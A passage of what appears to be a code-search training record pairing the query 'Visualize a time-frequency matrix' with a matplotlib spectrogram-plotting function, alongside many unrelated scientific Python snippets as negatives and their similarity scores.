p.flatten()*(np.log(p.flatten()+1e-20)-1) )\n KL = lambda h,p: np.sum( h.flatten()* np.log( h.flatten()/p.flatten() ) - h.flatten()+p.flatten())\n KLd = lambda u,p: np.sum( p.flatten()*( np.exp(-u.flatten()) -1) )\n dotp = lambda x,y: np.sum(x*y); \n\n err,Wprimal,Wdual = [],[],[]\n u = np.zeros_like(mu)\n v = np.zeros_like(nu)\n\n for _ in range(niter):\n u1=u\n u = ave(tau, u, lam*epsilon*np.log(mu) - lam*epsilon*lse( M(u,v) ) + lam*u )\n v = ave(tau, v, lam*epsilon*np.log(nu) - lam*epsilon*lse( M(u,v).T) + lam*v )\n gamma = np.exp(M(u,v))\n\n if rho==np.inf: \n Wprimal.append(dotp(c,gamma) - epsilon*H(gamma))\n Wdual.append( dotp(u,mu) + dotp(v,nu) - epsilon*np.sum(gamma) )\n err.append( np.linalg.norm( np.sum(gamma,axis=1)-mu ) )\n else:\n Wprimal.append( dotp(c,gamma) - epsilon*H(gamma) \\\n + rho*KL(np.sum(gamma,axis=1),mu) \\\n + rho*KL(np.sum(gamma,axis=0),nu) )\n\n Wdual.append( -rho*KLd(u/rho,mu) - rho*KLd(v/rho,nu) \\\n - epsilon*np.sum( gamma))\n err.append(np.linalg.norm(u-u1, ord=1) )\n \n WDistance = Wprimal[-1]+epsilon*H(gamma)\n\n return gamma,Wprimal,Wdual,err,WDistance", "def test_power(self):\r\n a = 6 # shape\r\n samples = 5000\r\n max = -0.06\r\n min = -3.3\r\n s = np.random.power(a, samples) * -1 * (min - max) + min\r\n plt.hist(s, bins=30, density=False)\r\n plt.xlabel('Interlayer point energy [eV]')\r\n plt.ylabel('Frequency')\r\n plt.show()", "def _kernel(self, point, observation, bandwidth):\n denom = bandwidth * ((2*math.pi)**.5) \n num = math.exp(-0.5 * ((point-observation)/bandwidth)**2)\n return num/denom", "def compute_stoch_gradient(y, tx, w):\n N = y.shape[0]\n e = y - np.dot(tx, w)\n \n return -1/N*np.dot(tx.T, e)", "def mt(P_1,V0_1,meanF_1,rho): \n psi = np.arctan2(V0_1[2],-V0_1[0])\n \n # Find swept ares\n idx_zmax = np.argmax(P_1[:,-1,2])\n idx_ymax = np.argmax(P_1[:,-1,1])\n idx_zmin = np.argmin(P_1[:,-1,2])\n \n Ad = np.linalg.norm(P_1[idx_zmax,-1,2]-P_1[idx_zmin,-1,2])*P_1[idx_ymax,-1,1]\n print P_1[idx_zmax,-1,2]\n V0 = np.linalg.norm(V0_1)\n \n Vi_1new = np.zeros_like(V0_1,dtype=float)\n\n while True:\n Vi_1 = Vi_1new\n \n Vi_1new[0] = meanF_1[0] / (2 * rho * Ad * np.sqrt( (V0*np.cos(psi)+Vi_1[0])**2 + (-V0*np.sin(psi)+Vi_1[2])**2 )) \n Vi_1new[2] = meanF_1[2] / (2 * rho * Ad * np.sqrt( (V0*np.cos(psi)+Vi_1[0])**2 + (-V0*np.sin(psi)+Vi_1[2])**2 )) \n \n if np.linalg.norm(Vi_1-Vi_1new) < 0.001:\n break\n\n return -Vi_1", "def powerLaw(minskew,minkurt,transform,x):\n exponent = 0.05\n while exponent < 20:\n y = x**exponent\n (newskew,newkurt) = computeMoments(y)\n (minskew,minkurt,transform) = checkMin(minskew,minkurt,newskew,newkurt,transform,exponent)\n exponent *= 1.5\n #endwhile\n return (minskew,minkurt,transform)", "def y01(x):\r\n # return pini*((special.gamma(k1+p1))/(special.gamma(k1)*special.gamma(p1))*((x/l)**(k1-1))*(1-(x/l))**(p1-1))/7.3572\r\n return 1/100*x*epsilon*1/q*1e21\r\n # return 1e13*1/sigma*np.sqrt(2*np.pi) * np.exp(-np.power(x - u, 2.) / (2 * np.power(sigma, 2.)))-1e15*1/sigma\r", "def fun_decay_inv(p,r):\n return (p[1]*r0 / r) * np.cos(p[0]*r + p[2])", "def modality(v):\n \n s = st.skew(vel, bias=False)\n k = st.kurtosis(vel, bias=False)\n m = (1+s**2)/(3+k**2)\n return s, k, m", "def beta_gen_slope(p):\n cardi = 0.005\n return np.array( [0]*int(p-int(cardi*p)) + list(np.arange(1, int(cardi*p)+1, 1)) )", "def ps(self, sigma, z):\n \n delta_c = self.params[0]\n \n return sqrt(2.e0/pi) * (delta_c/sigma) * exp( (-delta_c*delta_c)/(2.e0*sigma*sigma) )", "def wpe(nev):\n return np.sqrt(nev*eV2J**2/(me*epsilon));", "def dry_snow_density(self):\n return (self.rho - self.h2o_vol * RHO_W0) / \\\n (1 - self.h2o_vol * RHO_W0 / RHO_ICE)", "def func_gaussian(self, dmv, vpar):\n dmoff = dmv - vpar[0]\n sig = vpar[1]\n sig = sig * sig\n return np.exp(-0.5 * dmoff * dmoff / sig) * self.ThetaFunc(dmv)", "def test_temporal_smoothing_how(perfectModelEnsemble_initialized_control_1d_ym_cftime):\r\n pm = perfectModelEnsemble_initialized_control_1d_ym_cftime\r\n pm_smoothed_mean = pm.smooth({\"lead\": 4}, how=\"mean\")\r\n pm_smoothed_sum = pm.smooth({\"lead\": 4}, how=\"sum\")\r\n assert (\r\n pm_smoothed_sum.get_initialized().mean()\r\n > pm_smoothed_mean.get_initialized().mean() * 2\r\n )", "def likelihood(ts,w,Phi):\n a = Phi.dot(w)\n return np.exp(a*ts)*sigmoid(-a)", "def waveparameterh(L):\r\n return 8.13 - ((250 - 0.7 * L) / 125) ** 3", "def swe(lon, lat, month):\n\n im = month - 1\n\n h0 = np.array( [ 8.37, 9.43, 10.74, 11.67, 11.80, 12.48,\n 4.01, 1.08, 3.84, 6.24, 7.54, 8.00 ] )\n a = np.array( [ -0.0270, 0.0058, 0.1618, 0.0841, -0.0043, 0.2084,\n 0.0970, 0.0712, 0.0393, 0.1158, 0.0567, -0.0540 ] )\n b = np.array( [ -0.3400, -0.1309, 0.0276, -0.1328, -0.4284, -0.5739,\n -0.4930, -0.1450, -0.2107, -0.2803, -0.3201, -0.3650 ] )\n c = np.array( [ -0.0319, 0.0017, 0.0213, 0.0081, -0.0380, -0.0468,\n -0.0333, -0.0155, -0.0182, -0.0215, -0.0284, -0.0362 ] )\n d = np.array( [ -0.0056, -0.0021, 0.0076, -0.0003, -0.0071, -0.0023,\n -0.0026, 0.0014, -0.0053, 0.0015, -0.0032, -0.0112 ] )\n e = np.array( [ -0.0005, -0.0072, -0.0125, -0.0301, -0.0063, -0.0253,\n -0.0343, -0.0000, -0.0190, -0.0176, -0.0129, -0.0035 ] )\n\n x = (90. - lat) * np.cos( np.radians(lon) )\n y = (90. - lat) * np.sin( np.radians(lon) )\n\n h = ( h0[im] + ( a[im] * x ) + ( b[im] * y ) + ( c[im] * x * y ) +\n ( d[im] * x * x ) + ( e[im] * y * y ) )\n\n# h = np.where( h < 0., 0., h)\n \n return h", "def compute_gaussnewtonvec(self, p):\r\n self.net.set_direction(p)\r\n Rp_outputs = self.net.compute_Rp_outputs()\r\n return self.net.compute_loss_grad(Rp_outputs)", "def deltaW(N, m, h):\n return np.random.normal(0., np.sqrt(h), (N, m))\n # return levy.rvs(0., 1e-11, (N, m))+np.random.normal(0., np.sqrt(h), (N, m)) #levy distribution\n # return cauchy.rvs(0., 1e-4, (N, m)) #Cauchy distribution", "def pixel_ts_distribution(self):\n fig,ax = plt.subplots(figsize=(8,6))\n bins = np.linspace(0,25,501)\n tsvec=self.tsmap.vec\n ax.hist(tsvec, bins, log=True, histtype='step', lw=2, cumulative=-1, label='data');\n # make array corresponding to the hist\n h = np.histogram(tsvec, bins, )[0]\n x = bins[:-1]\n yh = sum(h)-h.cumsum() \n f = lambda x: np.exp(-x/2)\n ye=6e5*f(x)\n ax.plot(x, ye, '-g', lw=2, label='exp(-TS/2)')\n ax.fill_between(x,yh,ye,where=x>5, facecolor='red', alpha=0.6)\n plt.setp(ax, xscale='linear', xlabel='TS', ylim=(1,None), ylabel='# greater than TS')\n ax.legend()\n ax.set_title('Cumulative distribution of single-pixel TS values for {}'.format(self.skymodel),\n fontsize=14)\n ax.grid(True, alpha=0.5) \n fig.set_facecolor('white')\n return fig", "def tps_rpm_bij_normals_max(x_nd, y_md, n_iter = 20, reg_init = .1, reg_final = .001, rad_init = .1, rad_final = .005, rot_reg = 1e-3, normal_coef=0.0001, \n nwsize=.15, plotting = False, plot_cb = None):\n \n _,d=x_nd.shape\n regs = loglinspace(reg_init, reg_final, n_iter)\n rads = loglinspace(rad_init, rad_final, n_iter)\n\n f = ThinPlateSpline(d)\n f.trans_g = np.median(y_md,axis=0) - np.median(x_nd,axis=0)\n \n g = ThinPlateSpline(d)\n g.trans_g = -f.trans_g\n\n\n # r_N = None\n \n for i in xrange(n_iter):\n xwarped_nd = f.transform_points(x_nd)\n ywarped_md = g.transform_points(y_md)\n \n fwddist_nm = ssd.cdist(xwarped_nd, y_md,'euclidean')\n \n invdist_nm = ssd.cdist(x_nd, ywarped_md,'euclidean')\n \n \n \n \n r = rads[i]\n prob_nm = np.exp( -(fwddist_nm + invdist_nm / (2*r)))\n corr_nm, r_N, _ = balance_matrix3(prob_nm, 10, 1e-1, 2e-1)\n corr_nm += 1e-9\n \n wt_n = corr_nm.sum(axis=1)\n wt_m = corr_nm.sum(axis=0)\n\n wt_n = np.array(wt_n, dtype='float')\n wt_m = np.array(wt_m, dtype='float')\n\n\n xtarg_nd = (corr_nm/wt_n[:,None]).dot(y_md)\n ytarg_md = (corr_nm/wt_m[None,:]).T.dot(x_nd)\n\n e_x = tps_utils.find_all_normals_naive(x_nd, nwsize, flip_away = True, project_lower_dim=(d==3))\n e_y = tps_utils.find_all_normals_naive(y_md, nwsize, flip_away = True, project_lower_dim=(d==3))\n e_xt = tps_utils.find_all_normals_naive(xtarg_nd, nwsize, flip_away = True, project_lower_dim=(d==3))\n e_yt = tps_utils.find_all_normals_naive(ytarg_md, nwsize, flip_away = True, project_lower_dim=(d==3))\n \n # if plotting and i%plotting==0 and plot_cb is not None:\n # plot_cb(x_nd, y_md, xtarg_nd, corr_nm, wt_n, f)\n \n# f = fit_ThinPlateSpline_normals(x_nd, xtarg_nd, bend_coef = regs[i], wt_n=wt_n, rot_coef = rot_reg, normal_coef=normal_coef, nwsize = nwsize)\n# g = fit_ThinPlateSpline_normals(y_md, ytarg_md, bend_coef = regs[i], wt_n=wt_m, rot_coef = rot_reg, normal_coef=normal_coef, nwsize = nwsize)\n f = tps_eval(x_nd, xtarg_nd, e_x, e_xt, bend_coef = regs[i], wt_n=wt_n, rot_coef = rot_reg)#, normal_coef=normal_coef, nwsize = nwsize)\n g = tps_eval(y_md, ytarg_md, e_y, e_yt, bend_coef = regs[i], wt_n=wt_m, rot_coef = rot_reg)#, normal_coef=normal_coef, nwsize = nwsize)\n\n# f._cost = tps.tps_cost(f.lin_ag, f.trans_g, f.w_ng, f.x_na, xtarg_nd, regs[i], wt_n=wt_n)/wt_n.mean()\n#f g._cost = tps.tps_cost(g.lin_ag, g.trans_g, g.w_ng, g.x_na, ytarg_md, regs[i], wt_n=wt_m)/wt_m.mean()\n return f,g", "def denoise(self):\n\n #make sure the data has a len dividible by 2^2\n self.len_swt = self.len\n while not (self.len_swt/4).is_integer():\n self.len_swt -= 1\n\n inp = self.input_nobase[:self.len_swt]\n self.wave = pywt.Wavelet(self.wave_type)\n nLevel = pywt.swt_max_level(self.len_swt)\n self.coeffs = pywt.swt(inp,self.wave,level=2)\n\n print(\" \\t Denoise STW coefficients \\t %1.2f %1.2f\" %(self.TK,self.TT))\n (cA2, cD2), (cA1, cD1) = self.coeffs\n\n # rolling kurtosis\n k2 = self._rolling_kts(cD2,self.nwin)\n k1 = self._rolling_kts(cD1,self.nwin)\n\n # thresholding\n cD2[k2<self.TK] = 0\n cD1[k1<self.TK] = 0\n\n cA2[k2<self.TK] = 0\n cA1[k1<self.TK] = 0\n\n # universal threshold\n sigma_roll_1 = mad(cD1[cD1!=0])*np.ones(self.len_swt)\n uthresh_roll_1 = self.TT * sigma_roll_1 * np.sqrt(2*np.log(self.len_swt))\n cD1[abs(cD1)<uthresh_roll_1] = 0\n\n # universal threshold\n sigma_roll_2 = mad(cD2[cD2!=0])*np.ones(self.len_swt)\n uthresh_roll_2 = self.TT * sigma_roll_2 * np.sqrt(2*np.log(self.len_swt))\n cD2[abs(cD2)<uthresh_roll_2] = 0\n\n # final threshold\n cA1[cD1 == 0] = 0\n cA2[cD2 == 0] = 0\n self.denoised_coeffs = [(cA1,cD1),(cA2,cD2)]\n\n # denoise the data\n #self.input_denoised = self._iswt(self.denoised_coeffs,self.wave)\n self.input_denoised = pywt.iswt(self.denoised_coeffs,self.wave)", "def grad(self,w):\n # Calculate the vector -sigma(-y_i * x_i.w)\n s = -np.array([sigmoid(-yi * np.dot(xi,w)) for xi,yi in zip(self.x,self.y)])\n # Multiply it by xy\n g = np.array([np.dot(xyj,s) for xyj in self.xy.transpose()])\n # Add regularisation\n g += self.alpha*w\n return g\n #g = np.array([self.grad_j(w,j) for j in xrange(len(w))])", "def test_linear_2d_simplex():\n\n\n def fx(x, dt):\n F = np.array([[1, dt, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, dt],\n [0, 0, 0, 1]], dtype=float)\n\n return np.dot(F, x)\n\n def hx(x):\n return np.array([x[0], x[2]])\n\n\n dt = 0.1\n points = SimplexSigmaPoints(n=4)\n kf = UKF(dim_x=4, dim_z=2, dt=dt, fx=fx, hx=hx, points=points)\n\n\n kf.x = np.array([-1., 1., -1., 1])\n kf.P*=0.0001\n #kf.R *=0\n #kf.Q\n\n zs = []\n for i in range(20):\n z = np.array([i+randn()*0.1, i+randn()*0.1])\n zs.append(z)\n\n Ms, Ps = kf.batch_filter(zs)\n smooth_x, _, _ = kf.rts_smoother(Ms, Ps, dt=dt)\n\n if DO_PLOT:\n zs = np.asarray(zs)\n\n #plt.plot(zs[:,0])\n plt.plot(Ms[:,0])\n plt.plot(smooth_x[:,0], smooth_x[:,2])\n\n print(smooth_x)", "def smooth_kernel_fp(z, z_star, h, gamma=2):\n\n # compute probabilities\n p = np.exp(-(np.abs(z-z_star)/h)**gamma)\n # rescale\n p = p / np.sum(p)\n return np.squeeze(p)" ]
[ "0.64140326", "0.602416", "0.5890475", "0.5847634", "0.58306766", "0.5785613", "0.57544583", "0.57424194", "0.57397753", "0.57333004", "0.57170975", "0.5714303", "0.5707594", "0.5699608", "0.56825364", "0.5621545", "0.5603333", "0.56010664", "0.5588229", "0.5582662", "0.5576315", "0.5545373", "0.5539517", "0.5515134", "0.5511229", "0.55056465", "0.5499285", "0.54804885", "0.5462996", "0.5462898", "0.5456753", "0.54512006", "0.5450156", "0.5413868", "0.54105", "0.54040694", "0.54027236", "0.5399425", "0.5395388", "0.5382882", "0.53822047", "0.5365823", "0.5365823", "0.53646463", "0.53556216", "0.5351314", "0.5342557", "0.5336137", "0.5328472", "0.5326758", "0.5326434", "0.53175354", "0.5315796", "0.5311746", "0.53103507", "0.5309156", "0.53053385", "0.53023505", "0.5288558", "0.52870893", "0.52846044", "0.52833176", "0.52792823", "0.52702355", "0.52645737", "0.5257917", "0.5257707", "0.5257439", "0.5253719", "0.52534187", "0.5248328", "0.5245881", "0.524445", "0.5243954", "0.5235077", "0.52329636", "0.52308446", "0.5229106", "0.5225908", "0.5223699", "0.52233636", "0.5222418", "0.5222222", "0.5219845", "0.52196807", "0.5217409", "0.5211745", "0.52085656", "0.5205324", "0.5200611", "0.51998264", "0.5198484", "0.51961875", "0.51938516", "0.5183559", "0.5183515", "0.5182816", "0.51798636", "0.5179135", "0.5175856", "0.5172675" ]
0.0
-1
Visualize a timefrequency matrix.
def plot_timefrequency(z, time, f, signal=None, method="stft"): if method == "stft": figure_title = "Short-time Fourier Transform Magnitude" fig, ax = plt.subplots() for i in range(len(time)): ax.plot(f, z[:, i], label="Segment" + str(np.arange(len(time))[i] + 1)) ax.legend() ax.set_title("Signal Spectrogram") ax.set_ylabel("STFT Magnitude") ax.set_xlabel("Frequency (Hz)") elif method == "cwt": figure_title = "Continuous Wavelet Transform Magnitude" elif method == "wvd": figure_title = "Wigner Ville Distrubution Spectrogram" fig = plt.figure() plt.plot(time, signal) plt.xlabel("Time (sec)") plt.ylabel("Signal") elif method == "pwvd": figure_title = "Pseudo Wigner Ville Distribution Spectrogram" fig, ax = plt.subplots() spec = ax.pcolormesh(time, f, z, cmap=plt.get_cmap("magma"), shading="auto") plt.colorbar(spec) ax.set_title(figure_title) ax.set_ylabel("Frequency (Hz)") ax.set_xlabel("Time (sec)") return fig
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def plot_frequency(self):\n canvas = xboa.common.make_root_canvas(\"frequency vs time\")\n canvas.Draw()\n freq_list = [freq for freq in self.freq_list]\n hist, graph = xboa.common.make_root_graph(\"frequency vs time\",\n self.time_list, \"time [ns]\",\n freq_list, \"f [GHz]\")\n hist.Draw()\n graph.Draw(\"sameL\")\n fit = ROOT.TF1(\"fit\", \"pol4\", 0, 20*1e6)\n fit.FixParameter(0, freq_list[0])\n graph.Fit(fit)\n canvas.Update()", "def missingno_matrix(self, df, fontsize, time_freq):\n\n df.index = pd.to_datetime(df[\"timestamp\"], errors='coerce')\n df = df.resample('D').mean()\n fig, ax = plt.subplots(figsize=(17,8))\n ax = msno.matrix(df, labels=True, fontsize=fontsize, freq=time_freq, ax=ax, sparkline=True, inline=True);\n st.pyplot(fig)", "def matshow_tseries(time_series, fig=None, axis=0, xtick_n=5, time_unit=None,\r\n xlabel=None, ylabel=None):\r\n\r\n if fig is None:\r\n fig = plt.figure()\r\n\r\n if not fig.get_axes():\r\n ax = fig.add_subplot(1, 1, 1)\r\n else:\r\n ax = fig.get_axes()[axis]\r\n\r\n #Make sure that time displays on the x axis with the units you want:\r\n #If you want to change the time-unit on the visualization from that used to\r\n #represent the time-series:\r\n if time_unit is not None:\r\n tu = time_unit\r\n conv_fac = ts.time_unit_conversion[time_unit]\r\n #Otherwise, get the information from your input:\r\n else:\r\n tu = time_series.time_unit\r\n conv_fac = time_series.time._conversion_factor\r\n\r\n this_time = time_series.time / float(conv_fac)\r\n ax.matshow(time_series.data)\r\n\r\n ax.set_xticks(list(range(len(this_time)))[::len(this_time) / xtick_n])\r\n ax.set_xticklabels(this_time[::len(this_time) / xtick_n])\r\n\r\n if xlabel is None:\r\n ax.set_xlabel('Time (%s)' % tu)\r\n else:\r\n ax.set_xlabel(xlabel)\r\n\r\n if ylabel is not None:\r\n ax.set_ylabel(ylabel)\r\n\r\n return fig", "def show_matrix(matrix,kind=\"temperature\"):\n if kind==\"temperature\":\n cmap = \"bwr\"\n plt.title(\"Temperature\")\n elif kind==\"habitat\":\n cmap = \"Greens\"\n plt.title(\"Habitat\")\n else:\n cmap = \"Blues\"\n plt.imshow(matrix,\n interpolation='None',\n cmap=cmap,\n vmin=0,\n vmax=1,\n aspect=\"equal\",)\n plt.xlabel(\"x\")\n plt.ylabel(\"y\")\n\n plt.xticks([])\n plt.yticks([])\n plt.colorbar(orientation=\"horizontal\", fraction=0.045)", "def plot_table(self):\r\n q = dict(sorted(decorator.arr.items(), key=lambda item: item[1]))\r\n print(\"PROGRAM | RANK | TIME ELAPSED\")\r\n count = 1\r\n for i in q:\r\n print(i[0], \"\\t\", count, \"\\t\", float(q[i]) * 1000, \"ms\")\r\n count += 1", "def plot_time_frames(self):\n\n fig = plt.figure()\n plt.grid(True)\n\n plt.ylim([-1.5,1.5])\n plt.xlim([0,1])\n\n for key in self.timeframes.keys():\n if key == 0:\n plt.plot(self.x, self.timeframes[key], label=\"time: \" + str(round(key*self.dt, 3)), linewidth=5)\n else:\n plt.plot(self.x, self.timeframes[key], label=\"time: \" + str(round(key*self.dt, 3)))\n\n plt.title(\"Wave at different times\")\n plt.legend(loc=\"upper right\")\n plt.show()\n\n # fig.savefig('results/pics_wave/vibrating_string_'+ self.type + '.png', dpi=150)", "def plotTime(self):\n plt.figure()\n t = [i for i in range(len(self.nodes_infected))]\n print(t)\n plt.title('Nodos infectados vs Tiempo')\n plt.xlabel('Instantes de tiempo')\n plt.ylabel('# de nodos infectados')\n plt.plot(t, self.nodes_infected)\n plt.grid(True)\n plt.show()", "def visualize_tma_time_series(data_path):\n\n X, y = load_tma_data(data_path)\n\n fig = plt.figure()\n ax = fig.add_subplot('111')\n\n for i in range(X.shape[0]):\n C = X[i, ...].reshape(X.shape[1], X.shape[2])\n l = y[i]\n ax.imshow(C, vmin=0, vmax=1)\n ax.set_title('Label : %i' % l)\n plt.pause(0.1)\n\n # labels = np.unique(y)\n # fig, axes = plt.subplots(figsize=(13, 4), ncols=4)\n # for i, l in enumerate(labels, start=0):\n # idx = np.where(y == l)[0]\n # temp = np.mean(X[idx, ...], axis=0)\n # temp[:8, :] = temp[:8, :]*6\n # pos = axes[i].imshow(temp, vmin=0, vmax=1)\n # axes[i].set_title(\"Label : %i\" % l)\n # fig.colorbar(pos, ax=axes[i])\n # plt.show()", "def visualizations():\r\n raise NotImplementedError\r\n # df = pandas.read_csv('accidents_by_hour.csv', index_col=0, header=0)\r\n # plt.plot(0, 0, data=df)\r\n # plt.show()\r", "def plot(self, inline=True, fname=None, show_colorbar=False):\n color_norm = matplotlib.colors.Normalize(\n vmin=self.decibel_limits[0], vmax=self.decibel_limits[1]\n )\n\n plt.imshow(self.spectrogram[::-1], cmap=\"Greys\", norm=color_norm)\n\n # pick values to show on time and frequency axes\n yvals = self.frequencies.round(-2).astype(int)\n xvals = self.times.round(2)\n y_idx = [int(ti) for ti in np.linspace(0, len(yvals), 8)]\n y_idx[-1] -= 1\n plt.yticks(len(yvals) - np.array(y_idx), yvals[y_idx])\n x_idx = [int(ti) for ti in np.linspace(0, len(xvals), 6)]\n x_idx[-1] -= 1\n plt.xticks(x_idx, xvals[x_idx])\n\n # add axes labels\n plt.ylabel(\"frequency (Hz): mel scale\")\n plt.xlabel(\"time (sec)\")\n\n if show_colorbar:\n plt.colorbar()\n\n # if fname is not None, save to file path fname\n if fname:\n plt.savefig(fname)\n\n # if not saving to file, check if a matplotlib backend is available\n if inline:\n if os.environ.get(\"MPLBACKEND\") is None:\n warnings.warn(\"MPLBACKEND is 'None' in os.environ. Skipping plot.\")\n else:\n plt.show()", "def plot_freq_spec(data, title):\n plt.title(title)\n\n def plot_freq_spec(axis, line, label):\n n = len(axis)\n fft = fftpack.fft(axis) / n\n fft = fft[range(int(n / 2))]\n plt.plot(range(int(n / 2)), abs(fft), line, label=label)\n plot_freq_spec(data[:, 0], 'r-', label='x')\n plot_freq_spec(data[:, 1], 'g-', label='y')\n plot_freq_spec(data[:, 2], 'b-', label='z')", "def show_MAP_frequencies(self, figure_name):\n if not self.get('MAP_done'): return\n\n modes = self.get('modes') \n obs_freq = np.array([mode.freq for mode in modes]) # unit: per day\n d_freq = obs_freq[1:] - obs_freq[:-1]\n\n # MAP_names = self.get('feature_names')\n # MAP_features = self.get('MAP_feature')\n MAP_freq = self.get('MAP_frequencies')\n\n fig, ax = plt.subplots(1, figsize=(4,3), tight_layout=True)\n\n for k, freq in enumerate(obs_freq):\n ax.axvline(x=freq, ymin=0, ymax=1, linestyle='solid', color='r', lw=2)\n ax.axvline(x=MAP_freq[k], ymin=0, ymax=0.8, linestyle='dashed', color='k', lw=1)\n\n # Axis cosmetics\n ax.set_ylim(0, 1.2)\n ax.set_yticklabels(())\n ax.set_xlabel(r'Frequency (per day)')\n # Legend\n ax.plot([], [], linestyle='solid', lw=4, color='r', label='Observed')\n ax.plot([], [], linestyle='dashed', lw=2, color='k', label='Model')\n leg = ax.legend(loc=1)\n\n plt.savefig(figure_name)\n logger.info('show_MAP_frequencies: saved {0}'.format(figure_name))\n plt.close()", "def FourierPlot(tas):\n detrend = signal.detrend(tas)\n L = len(tas)\n freqs = np.fft.fftfreq(L)\n tas_fft = np.fft.fft(detrend)\n R = tas_fft.real\n Im = tas_fft.imag\n mag = np.sqrt(R**2+Im**2)\n plt.plot(1/freqs,mag)", "def plot_observed(self):\n \n fig = plt.figure(figsize=(15,5))\n plt.subplot(1,3,1)\n for k in self.observed_data.keys():\n plt.plot(self.observed_data[k][0], self.observed_data[k][1], 'bx')\n plt.xlabel(\"X\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n\n fig = plt.figure(figsize=(16,4))\n \n # Plot of time vs X\n plt.subplot(1,3,2)\n for k in self.observed_data.keys(): \n plt.plot(k*np.ones(self.observed_data[k].shape[1]), self.observed_data[k][0], 'bx')\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"X\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n\n # Plot of time vs Y\n plt.subplot(1,3,3)\n for k in self.observed_data.keys():\n plt.plot(k*np.ones(self.observed_data[k].shape[1]), self.observed_data[k][1], 'bx')\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n plt.show();", "def plot(self, inline=True, fname=None, show_colorbar=False):\n norm = matplotlib.colors.Normalize(\n vmin=self.decibel_limits[0], vmax=self.decibel_limits[1]\n )\n plt.pcolormesh(\n self.times,\n self.frequencies,\n self.spectrogram,\n shading=\"auto\",\n cmap=\"Greys\",\n norm=norm,\n )\n\n plt.xlabel(\"time (sec)\")\n plt.ylabel(\"frequency (Hz)\")\n if show_colorbar:\n plt.colorbar()\n\n # if fname is not None, save to file path fname\n if fname:\n plt.savefig(fname)\n\n # if not saving to file, check if a matplotlib backend is available\n if inline:\n if os.environ.get(\"MPLBACKEND\") is None:\n warnings.warn(\"MPLBACKEND is 'None' in os.environ. Skipping plot.\")\n else:\n plt.show()", "def plot_matrix(self, matrix: np.ndarray):\n sns.heatmap(matrix, annot=True)\n plt.show()", "def visualize(self):\n self.dataFrame.hist()\n plt.show()", "def plot_spectrum(self, energy_array: np.ndarray) -> None:\n spectrum, bins = np.histogram(\n energy_array,\n range=(0, 400),\n bins=3000)\n plt.plot(bins[:-1], spectrum)\n plt.xlabel(\"Energy (keV)\")\n plt.ylabel(\"Counts\")", "def plot_spectrum(wavetable: np.ndarray) -> None:\n ps = np.abs(np.fft.fft(wavetable)) ** 2\n\n time_step = 1 / 44100\n freqs = np.fft.fftfreq(wavetable.size, time_step)\n idx = np.argsort(freqs)\n\n plt.plot(freqs[idx], ps[idx])\n plt.show()", "def plottf(tfarray,tlst,flst,fignum=1,starttime=0,timeinc='hrs',\r\n dt=1.0,title=None,vmm=None,cmap=None,aspect=None,interpolation=None,\r\n cbori=None,cbshrink=None,cbaspect=None,cbpad=None,scale='log',\r\n normalize='n',):\r\n \r\n #time increment\r\n if timeinc=='hrs':\r\n tinc=3600/dt\r\n elif timeinc=='min':\r\n tinc=60/dt\r\n elif timeinc=='sec':\r\n tinc=1/dt\r\n else:\r\n raise ValueError(timeinc+'is not defined')\r\n #colormap\r\n if cmap==None:\r\n cmap='jet'\r\n else:\r\n cmap=cmap\r\n #aspect ratio\r\n if aspect==None:\r\n aspect='auto'\r\n else:\r\n aspect=aspect\r\n #interpolation\r\n if interpolation==None:\r\n interpolation='gaussian'\r\n else:\r\n interpolation=interpolation\r\n #colorbar orientation\r\n if cbori==None:\r\n cbori='vertical'\r\n else:\r\n cbori=cbori\r\n #colorbar shinkage\r\n if cbshrink==None:\r\n cbshrink=.99\r\n else:\r\n cbshrink=cbshrink\r\n #colorbar aspect\r\n if cbaspect==None:\r\n cbaspect=20\r\n else:\r\n cbaspect=cbaspect\r\n #colorbar pad\r\n if cbpad==None:\r\n cbpad=.1\r\n else:\r\n cbpad=cbpad\r\n #scale\r\n if scale=='log':\r\n zerofind=np.where(abs(tfarray)==0)\r\n tfarray[zerofind]=1.0\r\n if normalize=='y':\r\n plottfarray=10*np.log10(abs(tfarray/np.max(abs(tfarray))))\r\n else:\r\n plottfarray=10*np.log10(abs(tfarray))\r\n elif scale=='linear':\r\n if normalize=='y':\r\n plottfarray=abs(tfarray/np.max(abs(tfarray)))\r\n else:\r\n plottfarray=abs(tfarray)\r\n \r\n plt.rcParams['font.size']=10\r\n plt.rcParams['figure.subplot.left']=.08\r\n plt.rcParams['figure.subplot.right']=.99\r\n plt.rcParams['figure.subplot.bottom']=.07\r\n plt.rcParams['figure.subplot.top']=.96\r\n plt.rcParams['figure.subplot.wspace']=.25\r\n plt.rcParams['figure.subplot.hspace']=.20\r\n \r\n \r\n plt.figure(fignum)\r\n if vmm!=None:\r\n vmin=vmm[0]\r\n vmax=vmm[1]\r\n plt.imshow(plottfarray,extent=(tlst[0]/tinc+starttime,\r\n tlst[-1]/tinc+starttime,flst[0],flst[-1]),aspect=aspect,\r\n vmin=vmin,vmax=vmax,cmap=cmap,interpolation=interpolation)\r\n else:\r\n plt.imshow(plottfarray,extent=(tlst[0]/tinc+starttime,\r\n tlst[-1]/tinc+starttime,flst[0],flst[-1]),aspect=aspect,\r\n cmap=cmap,interpolation=interpolation)\r\n plt.xlabel('Time('+timeinc+')',fontsize=12,fontweight='bold')\r\n plt.ylabel('Frequency (Hz)',fontsize=12,fontweight='bold')\r\n if title!=None:\r\n plt.title(title,fontsize=14,fontweight='bold')\r\n plt.colorbar(orientation=cbori,shrink=cbshrink,pad=cbpad,aspect=cbaspect)\r\n plt.show()", "def display(array):\n plt.figure()\n plt.imshow(array)\n plt.show()", "def plotAll(fx,tfarray,tlst,flst,fignum=1,starttime=0,timeinc='hrs',\r\n dt=1.0,title=None,vmm=None,cmap=None,aspect=None,interpolation=None,\r\n cbori=None,cbshrink=None,cbaspect=None,cbpad=None,normalize='n',\r\n scale='log'):\r\n \r\n #time increment\r\n if timeinc=='hrs':\r\n tinc=3600/dt\r\n elif timeinc=='min':\r\n tinc=60/dt\r\n elif timeinc=='sec':\r\n tinc=1/dt\r\n else:\r\n raise ValueError(timeinc+'is not defined')\r\n #colormap\r\n if 